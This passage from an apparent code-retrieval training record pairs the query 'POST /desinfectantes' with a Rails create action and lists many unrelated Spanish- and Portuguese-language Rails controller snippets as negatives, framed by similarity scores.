"0.60752547",
"0.60641074",
"0.6060997",
"0.6059904",
"0.60556656",
"0.60539883",
"0.6037348",
"0.60288197",
"0.60282534",
"0.6021808",
"0.60175127",
"0.60149825",
"0.6004707",
"0.60002935",
"0.59981054",
"0.5994752",
"0.5987307",
"0.59807837",
"0.59805644",
"0.59772086",
"0.5976081",
"0.5975577",
"0.59744513",
"0.5973679",
"0.59720135",
"0.59662044",
"0.5965444",
"0.59636074",
"0.59614164",
"0.59561086",
"0.59487903",
"0.5948588",
"0.5943623",
"0.5942193",
"0.5938739",
"0.5927373",
"0.5927373",
"0.5927373",
"0.59211844",
"0.59203327",
"0.5916864",
"0.5914984",
"0.5908963",
"0.5905153",
"0.5903785",
"0.5901572",
"0.58966506",
"0.5895674",
"0.5892937"
] |
0.0
|
-1
|
POST /desinfectantes
POST /desinfectantes.json
|
def create
  # Build a new record from the whitelisted request parameters
  @desinfectante = Desinfectante.new(desinfectante_params)
  respond_to do |format|
    if @desinfectante.save
      # Success: redirect the browser, or return the created record as JSON
      format.html { redirect_to @desinfectante, notice: 'Desinfectante was successfully created.' }
      format.json { render :show, status: :created, location: @desinfectante }
    else
      # Validation failure: re-render the form, or return the errors as JSON
      format.html { render :new }
      format.json { render json: @desinfectante.errors, status: :unprocessable_entity }
    end
  end
end
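
The create action relies on a strong-parameters helper to whitelist mass-assignable attributes. A minimal sketch follows; the attribute list is taken from the desinfectante_params snippet that appears verbatim among the related methods later in this record.

# Private controller helper; whitelists the mass-assignable attributes
def desinfectante_params
  params.require(:desinfectante).permit(:marca, :tipo, :precio, :presentacion, :stock, :liquido)
end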
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def desinfectante_params\n params.require(:desinfectante).permit(:marca, :tipo, :precio, :presentacion, :stock, :liquido)\n end",
"def destroy\n @desinfectante.destroy\n respond_to do |format|\n format.html { redirect_to desinfectantes_url, notice: 'Desinfectante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def index\n @desinfectantes = Desinfectante.all\n end",
"def create\n logger.debug(\"Creando calabaza aa #{params[:deuda][:deuda_original_id]} #{params}\")\n @deuda = Deuda.new(params[:deuda])\n if(params[:deuda].has_key?(:deuda_original_id))\n logger.debug(\"Se slecciono deuda original\")\n if(@deuda.credito.present?)\n logger.debug(\"Estaba asociado con un credito\")\n @deuda.credito.deudas.delete(@deuda)\n end\n @deuda.credito_id=nil\n end\n\n respond_to do |format|\n if @deuda.save\n format.html { redirect_to @deuda, notice: 'Deuda was successfully created.' }\n format.json { render json: @deuda, status: :created, location: @deuda }\n else\n format.html { render action: \"new\" }\n format.json { render json: @deuda.errors, status: :unprocessable_entity }\n end\n end\n end",
"def set_desinfectante\n @desinfectante = Desinfectante.find(params[:id])\n end",
"def desafio_params\n params.require(:desafio).permit(:tipo, :titulo, :descripcion, :puntos)\n end",
"def create\n @desafio = Desafio.new(desafio_params)\n\n respond_to do |format|\n if @desafio.save\n format.html { redirect_to @desafio, notice: 'Desafio was successfully created.' }\n format.json { render :show, status: :created, location: @desafio }\n else\n format.html { render :new }\n format.json { render json: @desafio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def descuento_adicional_params\n params.require(:descuento_adicional).permit(:descuento_adicional, :detalle)\n end",
"def detalle_params\n params.require(:detalle).permit(:nofra, :codigoprd, :cantidad, :impuesto, :precio)\n end",
"def destroy\n @inscripcion_diplomado.destroy\n respond_to do |format|\n format.html { redirect_to inscripcion_diplomados_url, notice: 'La inscripción al diplomado fue eliminada correctamente.' }\n format.json { head :no_content }\n end\n end",
"def create\n @detpedido = Detpedido.new(detpedido_params)\n\n respond_to do |format|\n if @detpedido.save\n format.html { redirect_to @detpedido, notice: 'Detpedido was successfully created.' }\n format.json { render :show, status: :created, location: @detpedido }\n else\n format.html { render :new }\n format.json { render json: @detpedido.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @detalle = Detalle.new(params[:detalle])\n\n respond_to do |format|\n if @detalle.save\n format.html { redirect_to @detalle, notice: 'Detalle was successfully created.' }\n format.json { render json: @detalle, status: :created, location: @detalle }\n else\n format.html { render action: \"new\" }\n format.json { render json: @detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def deuda_params\n params.require(:deuda).permit(:nombre, :correo, :telefono, :valor, :interes, :descripcion, :tipo, :usuario)\n end",
"def destroy\n @detalle.destroy\n respond_to do |format|\n format.html { redirect_to detalles_url, notice: 'Detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n @detalle = Detalle.new(detalle_params)\n\n respond_to do |format|\n if @detalle.save\n format.html { redirect_to @detalle, notice: 'Detalle was successfully created.' }\n format.json { render :show, status: :created, location: @detalle }\n else\n format.html { render :new }\n format.json { render json: @detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @desafio.destroy\n respond_to do |format|\n format.html { redirect_to desafios_url, notice: 'Desafio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n\n if !params[:disponibilite][:creneau_ids].nil?\n\n Disponibilite.where(enseignant_id: params[:disponibilite][:enseignant_id]).where(jour_id: params[:disponibilite][:jour_id]).where(ecole_id: ecole.id).destroy_all\n\n params[:disponibilite][:creneau_ids].each do |creneau|\n Disponibilite.create(enseignant_id: params[:disponibilite][:enseignant_id], jour_id: params[:disponibilite][:jour_id], user_id: current_user.id, ecole_id: ecole.id, creneau_id: creneau)\n end\n redirect_to disponibilites_url\n #@disponibilite = current_user.disponibilites.new(disponibilite_params)\n else\n redirect_to new_disponibilite_path, notice: \"Veuillez choisir des heures pour la disponibilité du prof\"\n end\n\n end",
"def destroy\n @fornecedor.destroy\n addlog(\"Fornecedor apagado\")\n respond_to do |format|\n format.html { redirect_to fornecedores_url, notice: 'Fornecedor apagado com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def create\n @objeto = DetallePedido.new(detalle_pedido_params)\n\n respond_to do |format|\n if @objeto.save\n set_redireccion\n format.html { redirect_to @redireccion, notice: 'Detalle pedido was successfully created.' }\n format.json { render :show, status: :created, location: @objeto }\n else\n format.html { render :new }\n format.json { render json: @objeto.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @serie_detalle = SerieDetalle.new(serie_detalle_params)\n\n respond_to do |format|\n if @serie_detalle.save\n format.html { redirect_to @serie_detalle, notice: 'Serie detalle was successfully created.' }\n format.json { render :show, status: :created, location: @serie_detalle }\n else\n format.html { render :new }\n format.json { render json: @serie_detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @depoevento = Depoevento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @depoevento }\n end\n end",
"def destroy\n @informacioncomercial.destroy\n respond_to do |format|\n format.html { redirect_to informacioncomercials_url, notice: 'Informacioncomercial was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @descuento_adicional.destroy\n respond_to do |format|\n format.html { redirect_to descuento_adicionals_url, notice: 'Descuento adicional fue eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalle_factura.destroy\n respond_to do |format|\n format.html { redirect_to detalle_facturas_url, notice: 'Detalle factura was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def new\n \n @selecciones = Seleccion.where(\"cliente_id = ?\",usuario_actual.id)\n respond_to do |format|\n unless @selecciones.empty?\n @peso_total = Seleccion.peso_total(usuario_actual.id)\n @precio_total = Seleccion.precio_total(usuario_actual.id)\n @tarjetas = usuario_actual.tdc\n @orden = Orden.new(:direccion_entrega=>usuario_actual.direccion)\n t = Time.now\n fecha = t.strftime(\"%Y-%m-%d\")\n client = Savon::Client.new(\"http://192.168.1.121/DistribuidorFIF/webservices/servicio.php?wsdl\")\n preorden = \"<solicitud_pedido>\n <num_orden>001</num_orden>\n <nombre_comercio>Tukiosquito</nombre_comercio>\n <fecha_solicitud>\"+fecha.to_s+\"</fecha_solicitud>\n <nombre_cliente>\"+usuario_actual.nombre+\" \"+usuario_actual.apellido+\"</nombre_cliente>\n <direccion_comercio>\n <avenida>Sucre</avenida>\n <calle>-</calle>\n <edificio_casa>CC Millenium</edificio_casa>\n <local_apt>C1-15</local_apt>\n <parroquia>Leoncio Martinez</parroquia>\n <municipio>Sucre</municipio>\n <ciudad>Caracas</ciudad>\n <estado>Miranda</estado>\n <pais>Venezuela</pais>\n </direccion_comercio>\n <direccion_destino>\n <avenida>Santa Rosa</avenida>\n <calle>Tierras Rojas</calle>\n <edificio_casa>Villa Magica</edificio_casa>\n <local_apt>69</local_apt>\n <parroquia> </parroquia>\n <municipio>Zamora</municipio>\n <ciudad>Cua</ciudad>\n <estado>Miranda</estado>\n <pais>Venezuela</pais>\n </direccion_destino>\"\n @selecciones.each do |seleccion|\n p = Producto.find(seleccion.producto_id)\n preorden = preorden+\"\n <articulo>\n <id>\"+p.id.to_s+\"</id>\n <descripcion>\"+p.descripcion+\"</descripcion>\n <peso>\"+p.peso.to_s+\"</peso>\n <cantidad>\"+seleccion.cantidad.to_s+\"</cantidad>\n <precio>\"+p.precio.to_s+\"</precio>\n </articulo>\"\n end\n preorden = preorden+\"</solicitud_pedido>\"\n response = client.request :ejemplo, body: { \"value\" => preorden } \n if response.success? \n respuesta = response.to_hash[:ejemplo_response][:return]\n datos = XmlSimple.xml_in(respuesta)\n end\n\n @precio_envio = datos[\"num_orden\"][0]\n #@arreglo = XmlSimple.xml_in('')\n #@xml = XmlSimple.xml_out(@arreglo, { 'RootName' => 'solicitud_pedido' })\n #url = 'http://192.168.1.101/Antonio/tukyosquito/proyecto/servicio/servicio.php'\n #cotizacion = SOAP::RPC::Driver.new(url)\n #cotizacion.add_method('obtener','asd')\n #tdc = Tarjeta.where(\"id = ? AND cliente_id = ?\",params[:orden][:tarjeta_id],usuario_actual.id)\n #@respuesta = cotizacion.obtener('123')\n format.html # new.html.erb\n else\n format.html { redirect_to carrito_path, notice: 'No tiene productos agregados al carro de compras para generar una orden.' }\n end\n end\n end",
"def descuento_adicional_params\n params.require(:descuento_adicional).permit(:detalle_descuento, :descuento_adicional)\n end",
"def despesa_params\n params.require(:despesa).permit(:descricao, :data, :valor, :observacao, :anexo, :tenant_id, :user_id, :fornecedor_id, :tipo_despesa_id, :condominio_id, :forma_pagamento_id)\n end",
"def destroy\n @informacao_ged.destroy\n respond_to do |format|\n format.html { redirect_to informacoes_ged_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @faixa_de_desconto = FaixaDeDesconto.find(params[:id])\n @faixa_de_desconto.destroy\n\n respond_to do |format|\n format.html { redirect_to(faixas_de_desconto_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @interventoriasfecha = Interventoriasfecha.find(params[:id])\n @interventoriasfecha.destroy\n\n respond_to do |format|\n format.html { redirect_to(interventoriasfechas_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @estado_despacho.destroy\n respond_to do |format|\n format.html { redirect_to estado_despachos_url }\n format.json { head :no_content }\n end\n end",
"def despesa_params\n params.require(:despesa).permit(:nome, :descricao, :valor)\n end",
"def destroy\n @devi.destroy\n respond_to do |format|\n format.html { redirect_to devis_url, notice: \"Le devis a été supprimé.\" }\n format.json { head :no_content }\n end\n end",
"def lista_desejo_params\n params.require(:lista_desejo).permit(:produto_id, :perfil_id)\n end",
"def destroy\n @diagnostiqueur.destroy\n respond_to do |format|\n format.html { redirect_to diagnostiqueurs_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fertilizante.destroy\n respond_to do |format|\n format.html { redirect_to fertilizantes_url, notice: 'Fertilizante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create_declinaison\n\t\t@panier_autorise_model = PanierAutorise.find(params[:panier][:id])\n\t\t@declinaison_panier_autorise = DeclinaisonPanierAutorise.where('panier_autorise_id = ?', @panier_autorise_model.id)\n\t\t@declinaison_exist = false\n\t\t@declinaison_panier_autorise.each do |panier_|\n\t\t\tif panier_.nombre_personne.to_i == params[:declinaison_panier_autorise][:nombre_personne].to_i && panier_.duree.to_i == params[:declinaison_panier_autorise][:duree].to_i \n\t\t\t\t@declinaison_exist = true\n\t\t\tend\n\t\tend\n\t\t\n\t\t\n\t\tif @declinaison_exist == false\n\t\t\t@declinaison_panier_autorise = DeclinaisonPanierAutorise.new()\n\t\t\t@declinaison_panier_autorise.panier_autorise_id = @panier_autorise_model.id\n\t\t\t@declinaison_panier_autorise.prix_panier_ht = params[:declinaison_panier_autorise][:prix_panier_ht]\n\t\t\t@declinaison_panier_autorise.prix_panier_ttc = params[:declinaison_panier_autorise][:prix_panier_ttc]\n\t\t\t@declinaison_panier_autorise.nombre_personne = params[:declinaison_panier_autorise][:nombre_personne]\n\t\t\t@declinaison_panier_autorise.duree = params[:declinaison_panier_autorise][:duree]\n\t\t\tif @declinaison_panier_autorise.save\n\t\t\t\trespond_to do |format|\n\t\t\t \t\tformat.json { render :json => {\n\t\t\t\t \t\t:status => \"OK\",\n\t\t\t\t \t\t:error => 'Declinaison ajoute',\n\t\t\t\t \t\t:declinaison_panier_autorise => @declinaison_panier_autorise\n\t\t\t\t \t\t} \n\t\t\t\t \t}\n\t\t\t \t\tformat.html { \n\t\t\t \t\t\tflash[:notice] = 'La declinaison existe deja'\n\t\t\t \t\t\trender 'new' \n\t\t\t \t\t}\n\t\t\t \tend\n\t\t\t end\n\t\t\n\t\telse\n\t\t\trespond_to do |format|\n\t\t \t\tformat.json { render :json => {\n\t\t\t \t\t:status => \"error\",\n\t\t\t \t\t:error => 'La declinaison existe deja'\n\t\t\t \t\t} \n\t\t\t \t}\n\t\t \t\tformat.html { \n\t\t \t\t\tflash[:notice] = 'La declinaison existe deja'\n\t\t \t\t\trender 'new' \n\t\t \t\t}\n\t\t \tend\n\t\tend\t\n\tend",
"def create\n @faixa_de_desconto = FaixaDeDesconto.new(params[:faixa_de_desconto])\n\n respond_to do |format|\n if @faixa_de_desconto.save\n flash[:notice] = 'FaixaDeDesconto was successfully created.'\n format.html { redirect_to(@faixa_de_desconto) }\n format.xml { render :xml => @faixa_de_desconto, :status => :created, :location => @faixa_de_desconto }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @faixa_de_desconto.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @depoevento = Depoevento.new(params[:depoevento])\n\n respond_to do |format|\n if @depoevento.save\n format.html { redirect_to @depoevento, notice: 'Depoevento was successfully created.' }\n format.json { render json: @depoevento, status: :created, location: @depoevento }\n else\n format.html { render action: \"new\" }\n format.json { render json: @depoevento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def detalle_params\n params.permit(:nofra, :codigoprd, :cantidad, :impuesto, :precio)\n end",
"def solicitar_lista_entregas_pdd pdd,kind,start_time,end_time\n require \"rubygems\"\n require 'json'\n require \"net/http\"\n require 'yaml'\n \n \n uri=URI( 'http://162.243.215.24/PDV/PDD_list_deliveries')\n \n resp = Net::HTTP.post_form(uri,'pddid'=>pdd,'kind'=>kind,'startime'=>start_time,'endtime'=>end_time,'token'=>\"mentira\")\n @record=JSON.parse(resp.body)\n @record\n #função ok\n \n end",
"def solicitudes_ingresadas\n\n if params[:desde] and params[:hasta]\n institucion_nombre = current_usuario.institucion.abreviatura\n\n d_desde = Date.new(params[:desde][2].to_i, params[:desde][1].to_i, params[:desde][0].to_i)\n d_hasta = Date.new(params[:hasta][2].to_i, params[:hasta][1].to_i, params[:hasta][0].to_i)\n\n @solicitudes = Solicitud.ingresadas(d_desde, d_hasta)\n end\n\n respond_to do |format|\n format.html { render :parametros_fecha }\n format.pdf do\n render :pdf => \"solicitudes_ingresadas_#{Time.now.to_i}\", \\\n :layout => \"print.html\", \\\n :page_size => \"Legal\", \\\n :orientation => \"Landscape\", \\\n :disposition=> 'attachment',\n :encoding => 'UTF-8'\n end\n end\n end",
"def destroy\n @solicitante.destroy\n respond_to do |format|\n format.html { redirect_to solicitantes_url, notice: 'Solicitante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n @deporte = Deporte.new(deporte_params)\n\n if @deporte.save\n render :show, status: :created, location: @deporte\n else\n render json: @deporte.errors, status: :unprocessable_entity\n end\n end",
"def destroy\n @detalle = Detalle.find(params[:id])\n @detalle.destroy\n\n respond_to do |format|\n format.html { redirect_to detalles_url }\n format.json { head :no_content }\n end\n end",
"def listado_params\n params.require(:listado).permit(:asignatura_id, :estudiantes)\n end",
"def create\n @lista_desejo = ListaDesejo.new(lista_desejo_params)\n\n respond_to do |format|\n if @lista_desejo.save\n format.html { redirect_to back_uri, warning: 'Adicionado a lista de desejos.' }\n format.json { render :show, status: :created, location: @lista_desejo }\n else\n format.html { render :new }\n format.json { render json: @lista_desejo.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @datos_estudiante.destroy\n respond_to do |format|\n format.html { redirect_to datos_estudiantes_url, notice: 'Datos estudiante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalhe.destroy\n respond_to do |format|\n format.html { redirect_to detalhes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @it_inscripcion_registro.destroy\n respond_to do |format|\n format.html { redirect_to it_inscripcion_registros_url, notice: 'El registro de inscripción se eliminó correctamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @informacao.destroy\n respond_to do |format|\n format.html { redirect_to informacoes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @descuento_adicional.destroy\n respond_to do |format|\n format.html { redirect_to descuento_adicionals_url, notice: 'Descuento adicional was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n @descuento = Descuento.new(descuento_params)\n\n respond_to do |format|\n if @descuento.save\n format.html { redirect_to @descuento, notice: 'Descuento fue creado exitosamente.' }\n format.json { render :show, status: :created, location: @descuento }\n else\n format.html { render :new }\n format.json { render json: @descuento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @adicional_desconto = AdicionalDesconto.find(params[:id])\n @adicional_desconto.destroy\n\n respond_to do |format|\n flash[:notice] = 'Adicional / Desconto excluído com sucesso.'\n #format.html { redirect_to(adicional_descontos_url) }\n format.html { redirect_to(adicional_descontos_path) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @serie_detalle.destroy\n respond_to do |format|\n format.html { redirect_to serie_detalles_url, notice: 'Serie detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def detalle_params\n params.require(:detalle).permit(:jobName, :buildNumber, :output, :ejecutor, :fecha, :tiendas, :status, :pos)\n end",
"def destroy\n @solicitud.destroy\n respond_to do |format|\n format.html { redirect_to solicitudes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detpedido.destroy\n respond_to do |format|\n format.html { redirect_to detpedidos_url, notice: 'Detpedido was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def dece_params\n params.require(:dece).permit(:date_dc, :local, :nom, :prenom, :date_nai, :lieu_nai, :sexe, :situ_mat, :profession, :domicil, :nom_prenom_pere, :nom_prenom_mere, :nom_prenom_declare, :domicil_declare, :profession_declare, :date_declare_dece, :nom_prenom_officie, :qualite_officie, :date_officie, :n_volet)\n end",
"def create\n @adicional_desconto = AdicionalDesconto.new(params[:adicional_desconto])\n\n respond_to do |format|\n if @adicional_desconto.save\n flash[:notice] = 'Adicional / Desconto cadastrado com sucesso.'\n #format.html { redirect_to(@adicional_desconto) }\n format.html { redirect_to(adicional_descontos_path) }\n format.xml { render :xml => @adicional_desconto, :status => :created, :location => @adicional_desconto }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @adicional_desconto.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @deuda = Deuda.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @deuda }\n end\n end",
"def destroy\n @descuento = Descuento.find(params[:id])\n @descuento.destroy\n\n respond_to do |format|\n format.html { redirect_to descuentos_url }\n format.json { head :no_content }\n end\n end",
"def create_ofertas\n\n\n\n arr_ofertas = []\n params.select { |par, val| par.starts_with?('oferta') && val.present? }.each do |puja|\n mid = puja.first.delete('oferta_')\n eliminar = params[\"delflag#{mid}\"] == '1'\n oferta = Oferta.new :mercado_id => mid, :seleccion_id => current_user.current_seleccion(session).id, :valor => puja.last.to_f, :estado => Oferta::PENDIENTE\n oferta.estado = Oferta::CANCELADA if eliminar\n\n oferta = oferta.save_if_valid\n arr_ofertas << I18n.t('mercado.oferta.oferta_creada', {:jugador => oferta.mercado.jugador.nombre, :valor => oferta.valor})\n end\n\n flash.now[:notice] = arr_ofertas.join '<br/>'\n\n # actualizamos los datos\n datos_ofertas\n\n respond_to do |format|\n format.js\n end\n\n end",
"def new\n @detalle = Detalle.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @detalle }\n end\n end",
"def destroy\n @estado_notificacion.destroy\n respond_to do |format|\n format.html { redirect_to estado_notificacions_url }\n format.json { head :no_content }\n end\n end",
"def create\n @detalle_factura = DetalleFactura.new(detalle_factura_params)\n\n respond_to do |format|\n if @detalle_factura.save\n format.html { redirect_to @detalle_factura, notice: 'Detalle factura was successfully created.' }\n format.json { render :show, status: :created, location: @detalle_factura }\n else\n format.html { render :new }\n format.json { render json: @detalle_factura.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @adicional_desconto = AdicionalDesconto.new\n @adicional_desconto_tipos = AdicionalDescontoTipo.find(:all)\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @adicional_desconto }\n end\n end",
"def new\n @descuento = Descuento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @descuento }\n end\n end",
"def despacho_params\n params.require(:despacho).permit(:cliente_id, :nombre, :lugar_de_entrega, :telefono, :celular, :correo)\n end",
"def destroy\n @dfactura.destroy\n respond_to do |format|\n format.html { redirect_to dfacturas_url, notice: 'Detalle de factura eliminado con éxito.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @deuda = Deuda.find(params[:id])\n @deuda.destroy\n\n respond_to do |format|\n format.html { redirect_to deudas_url }\n format.json { head :no_content }\n end\n end",
"def create\n @descuento = Descuento.new(params[:descuento])\n\n respond_to do |format|\n if @descuento.save\n format.html { redirect_to @descuento, notice: 'Descuento was successfully created.' }\n format.json { render json: @descuento, status: :created, location: @descuento }\n else\n format.html { render action: \"new\" }\n format.json { render json: @descuento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @tecnica_de_impresion.destroy\n respond_to do |format|\n format.html { redirect_to tecnicas_de_impresion_url, notice: 'Tecnica de impresion was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @desire.destroy\n\n respond_to do |format|\n format.html { redirect_to desires_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @ordenes_consumos_detalle.destroy\n respond_to do |format|\n format.html { redirect_to ordenes_consumos_detalles_url, notice: 'Ordenes consumos detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @interessado.destroy\n respond_to do |format|\n format.html { redirect_to interessados_url }\n format.json { head :no_content }\n end\n end",
"def new\n @deporte_usuario = DeporteUsuario.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @deporte_usuario }\n end\n end",
"def destroy\n set_redireccion\n @objeto.destroy\n respond_to do |format|\n format.html { redirect_to @redireccion, notice: 'Detalle pedido was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n params[:futbolada][:usuario_id] = current_usuario.id\n @futbolada = Futbolada.new(params[:futbolada])\n\n respond_to do |format|\n if @futbolada.save\n @futbolada.numero = \"#{Time.zone.now.strftime('%Y%m%d%H%M%S')}-#{@futbolada.id}F\"\n @futbolada.save\n StatusServicioSolicitado.servicio_email(current_usuario,@futbolada).deliver\n session[:exito] = \"si\"\n session[:modulo] = \"futbolada\"\n format.html { redirect_to index_url }\n format.json { render json: @futbolada, status: :created, location: @futbolada }\n else\n format.html { render action: \"new\" }\n format.json { render json: @futbolada.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @estado_remate.destroy\n respond_to do |format|\n format.html { redirect_to estado_remates_url }\n format.json { head :no_content }\n end\n end",
"def create\n @enfermedade = Enfermedade.new(enfermedade_params)\n\n respond_to do |format|\n if @enfermedade.save\n format.html { redirect_to new_padecimiento_path, notice: 'Ahora, por favor dinos a qué eres alérgico' }\n\n else\n format.html { render action: 'new' }\n format.json { render json: @enfermedade.errors, status: :unprocessable_entity }\n end\n end\n end",
"def detalle_params \n params.permit(:nofra, :codigoprd, :cantidad, :impuesto, :precio)\n end",
"def devolucao_params\n params.require(:devolucao).permit(:data, :nivel_combustivel, :quilometragem, \n :entregou_notas, :veiculo_id, :usuario_id, :status, :reserva_id)\n end",
"def destroy\n @solicitudinforme.destroy\n respond_to do |format|\n format.html { redirect_to solicitudinformes_url, notice: 'Solicitudinforme was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @datos_insumos_reactivo.destroy\n respond_to do |format|\n format.html { redirect_to datos_insumos_reactivos_url }\n format.json { head :no_content }\n end\n end",
"def create\n \n @endereco = Endereco.new(params[:endereco])\n\t@endereco.cliente_id=session[:usuario_id]\n\t\n respond_to do |format|\n if @endereco.save\n format.html { redirect_to \"/dados\", notice: 'O endereço foi cadastrado com sucesso!' }\n format.json { render json: @endereco, status: :created, location: @endereco }\n else\n format.html { render action: \"new\" }\n format.json { render json: @endereco.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @inscripcion.destroy\n respond_to do |format|\n format.html { redirect_to inscripcions_url, notice: 'Inscripcion was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def update\n respond_to do |format|\n if @desinfectante.update(desinfectante_params)\n format.html { redirect_to @desinfectante, notice: 'Desinfectante was successfully updated.' }\n format.json { render :show, status: :ok, location: @desinfectante }\n else\n format.html { render :edit }\n format.json { render json: @desinfectante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @fornecedor_endereco.destroy\n respond_to do |format|\n format.html { redirect_to fornecedor_enderecos_url, notice: 'Fornecedor endereco was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def devolucion_params\n params.require(:devolucion).permit(:id_devolucion, :fecha_devolucion)\n end",
"def tecnicos_postulados\n coleccion = []\n self.request.each do |request|\n info = {}\n info[:id] = request.id\n info[:article] = request.article\n info[:servicio] = request.service.description\n info[:tecnicos] = request.proposal\n coleccion.append(info)\n end\n coleccion\n end",
"def destroy\n @donante.destroy\n respond_to do |format|\n format.html { redirect_to donantes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @faltante.destroy\n respond_to do |format|\n format.html { redirect_to faltantes_url, notice: 'Faltante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @depoevento = Depoevento.find(params[:id])\n @depoevento.destroy\n\n respond_to do |format|\n format.html { redirect_to depoeventos_url }\n format.json { head :ok }\n end\n end",
"def create\n @organisme = Organisme.new(organisme_params)\n params[:departements] ||= []\n @organisme.departements.delete_all\n @dep_table = params[:departements]\n logger.debug \"Departements table sent : #@dep_table\"\n @dep_table.each do |depid|\n @organisme.departements << Departement.find(depid)\n end\n respond_to do |format|\n if @organisme.save\n format.html { redirect_to action: \"index\", notice: 'Organisme was successfully created.' }\n format.json { render :index, status: :created, location: @organisme }\n else\n format.html { render :new }\n format.json { render json: @organisme.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @solicitacao_tipo.destroy\n respond_to do |format|\n format.html { redirect_to solicitacao_tipos_url }\n format.json { head :no_content }\n end\n end",
"def new\n @expediente = Expediente.new\n @municipios = Municipio.all\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @expediente }\n end\n end",
"def create\n @descuento_adicional = DescuentoAdicional.new(descuento_adicional_params)\n\n respond_to do |format|\n if @descuento_adicional.save\n format.html { redirect_to @descuento_adicional, notice: 'Descuento adicional fue creado exitosamente.' }\n format.json { render :show, status: :created, location: @descuento_adicional }\n else\n format.html { render :new }\n format.json { render json: @descuento_adicional.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @datosgenerale.destroy\n respond_to do |format|\n format.html { redirect_to datosgenerales_url }\n format.json { head :no_content }\n end\n end",
"def create\n @estado_despacho = EstadoDespacho.new(estado_despacho_params)\n\n respond_to do |format|\n if @estado_despacho.save\n format.html { redirect_to @estado_despacho, notice: 'Estado despacho was successfully created.' }\n format.json { render :show, status: :created, location: @estado_despacho }\n else\n format.html { render :new }\n format.json { render json: @estado_despacho.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.6715804",
"0.64218324",
"0.62631243",
"0.6013901",
"0.58974636",
"0.58731997",
"0.5789425",
"0.577496",
"0.5768931",
"0.57493615",
"0.57434523",
"0.5661222",
"0.5650956",
"0.56354165",
"0.56324345",
"0.5581517",
"0.5562345",
"0.5549814",
"0.5548201",
"0.55382335",
"0.5538218",
"0.55352926",
"0.5525808",
"0.55210894",
"0.5518888",
"0.55088043",
"0.55072886",
"0.54986495",
"0.5476496",
"0.546379",
"0.54594713",
"0.5458466",
"0.5452543",
"0.5448581",
"0.54449636",
"0.54431003",
"0.54367006",
"0.5430103",
"0.5427039",
"0.5417988",
"0.5410215",
"0.54057276",
"0.5404495",
"0.5403637",
"0.53757733",
"0.53697246",
"0.5362125",
"0.53596604",
"0.5357548",
"0.53565437",
"0.5354525",
"0.53542125",
"0.53521574",
"0.53448206",
"0.5344592",
"0.5343678",
"0.5339021",
"0.5336358",
"0.5335423",
"0.5334873",
"0.53320765",
"0.53275543",
"0.5323121",
"0.5321969",
"0.53207433",
"0.53171015",
"0.5313298",
"0.5310646",
"0.5308801",
"0.5304889",
"0.5302873",
"0.53011763",
"0.5295491",
"0.5295377",
"0.52953064",
"0.529405",
"0.5293441",
